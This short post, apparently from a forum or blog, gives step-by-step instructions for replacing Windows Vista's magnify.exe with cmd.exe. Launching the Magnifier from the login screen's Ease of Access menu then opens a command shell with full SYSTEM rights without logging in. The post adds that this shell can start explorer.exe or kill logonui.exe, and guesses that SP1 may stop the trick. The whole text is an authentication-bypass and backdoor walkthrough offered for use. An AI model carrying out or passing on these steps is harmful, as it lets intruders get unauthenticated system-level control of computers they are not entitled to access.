You can run a cmd.exe shell on vista without login and with full system rights:
- take ownership of file %WINDIR%system32magnify.exe
- change permission of file %WINDIR%system32magnify.exe and add full control to your user
- copy cmd.exe to %WINDIR%system32magnify.exe (overwrite)
- start “Ease of access” and select “Make items on the screen lager (Magnifier)”
- Press ok
There is now a cmd shell with system rights (whoami).
You can even start explorer.exe or kill logonui.exe. If you logon the opened cmd shell will be also available in you logged on session BUT with your user creditentials.
Hint: this *shouldn’t* be possible with sp1 anymore, we’ll see.